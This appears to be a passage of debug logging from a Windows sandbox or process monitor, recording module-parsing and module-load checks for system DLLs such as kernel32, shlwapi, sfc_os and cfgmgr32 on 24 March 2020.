2020-03-24 10:16:37,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,803 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,803 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,803 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:37,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,913 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,913 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,913 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,913 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,928 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:37,928 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:37,928 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:37,928 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:37,944 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:37,944 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:37,944 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:37,944 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:37,960 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:37,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:37,960 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:37,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:37,976 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:37,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:37,976 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:37,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:37,990 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:37,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:37,990 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:38,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:38,006 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:38,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:38,006 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:38,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:38,023 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:38,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:38,023 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:38,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:38,023 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:38,038 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:38,038 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:38,038 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:38,038 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,147 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,147 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,147 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:38,147 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:38,163 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,163 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,163 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,163 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,224 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,224 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,224 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:38,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:38,240 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:38,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:38,240 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:38,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:38,256 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:38,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:38,272 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,272 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,272 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,349 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,349 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,397 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,397 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,397 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,459 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,459 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,459 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,474 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,474 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,693 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
